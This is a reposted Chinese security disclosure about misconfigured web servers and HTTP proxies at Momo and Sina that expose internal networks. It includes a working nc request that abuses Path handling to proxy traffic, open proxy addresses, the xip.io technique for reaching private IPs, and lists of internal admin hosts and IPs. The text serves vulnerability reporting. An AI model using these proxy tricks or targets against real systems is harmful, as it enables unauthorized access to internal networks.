陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网) 找到相关案例20160614-白红宇

陌陌web服务器Path处理不当可以正向代理(idc机器/打不到办公网) 找到相关案例20160614

阅读量：3730 次

发布时间：2019-05-22

本文共 2128 字，大约阅读时间需要 7 分钟。

简要描述：

陌陌一台web服务器Path处理不当，可以正向代理，是idc的机器，可以在idc内穿，但打不到办公网。 (┬＿┬)

详细说明：

存在问题的web服务器是 chatst.immomo.com:80

code 区域

GET :@www.lijiejie.com/xss.js HTTP/1.1 Host: chatst.immomo.com

如图，已经可以代理访问www.lijiejie.com

漏洞证明：

code 区域

root@xxxx:~/test# echo -e "GET :@www.lijiejie.com/xss.js HTTP/1.1\r\nHost: chatst.immomo.com\r\n\r\n" | nc chatst.immomo.com 80 HTTP/1.1 200 OK Content-Length: 51 Expires: Tue, 27 Sep 2016 08:22:10 GMT Server: MOMO Last-Modified: Tue, 26 Jan 2016 07:40:04 GMT Cache-Control: max-age=15552000 Date: Thu, 31 Mar 2016 08:22:09 GMT Content-Type: application/octet-stream alert('XSS on ' + document.domain + '\n' + Date())

测试了几个IP地址，办公网打不通：

code 区域

office.wemomo.com             	172.16.7.3 hermes.wemomo.com             	10.80.103.160

但还是找了个不通的：

code 区域

maven.wemomo.com              	211.152.99.47

大家无法直接访问http://maven.wemomo.com的web服务，但是代理OK的。

新浪HTTP代理ACL不严可以访问内网资源

HTTP代理：

code 区域

111.161.78.250   80

ACL不严，可以访问10和172私有网络中一部分web服务。

漏洞证明：

比如：

code 区域

http://ht.blog.sina.com.cn/ http://pub.ipay.sina.com/secure/Dashboard.jspa http://zabbix.d9.sina.com.cn/overview.php?ddreset=1&sid=63d3b008f04eff18 http://mirrors.sina.com.cn/ http://i.search.sina.com.cn/ http://metrics.sae.sina.com.cn/ http://i.m.esf.sina.com.cn/ http://team.monitor.sina.com.cn/

新浪HTTP代理配置不当漫游内网

http代理：

code 区域

202.106.169.142 80 pisces.sina.com.cn  80

不能直接代理sina.com.cn的域名。但是可以用xxx.xip.io域名代理访问内网服务器。可直接打内网。

漏洞证明：

将IE浏览器的代理设置为：

code 区域

202.106.169.142 80

然后测试访问几个web服务：

code 区域

admin.mail.sina.com.cn        	10.13.3.23

邮箱的管理后台：

data.sina.com.cn 10.210.101.41

访问http://10.210.101.41.xip.io/会302重定向

code 区域

http://cas.erp.sina.com.cn/cas/login?service=http%3A%2F%2Fpdata.erp.sina.com.cn%2Fxch_v10%2Flogin.php&ext=

根据DNS记录：erp.sina.com.cn 10.210.101.100

访问http://10.210.101.100.xip.io/会302重定向到http://my.erp.sina.com.cn/

根据DNS记录　dip.sina.com.cn 10.13.56.254

访问http://10.13.56.254.xip.io，会重定向到：

http://cas.erp.sina.com.cn/cas/logout?service=http://cas.erp.sina.com.cn/cas/login?service=http://portal.dip.sina.com.cn/login.action

直接访问博客管理后台：　ht.blog.sina.com.cn 10.69.3.240

访问it后台：　admin.it.sina.com.cn 10.210.128.128

同类的域名还有不少，不再列举。

修复方案：

正确配置代理

转载地址：http://fimnn.baihongyu.com/

你可能感兴趣的文章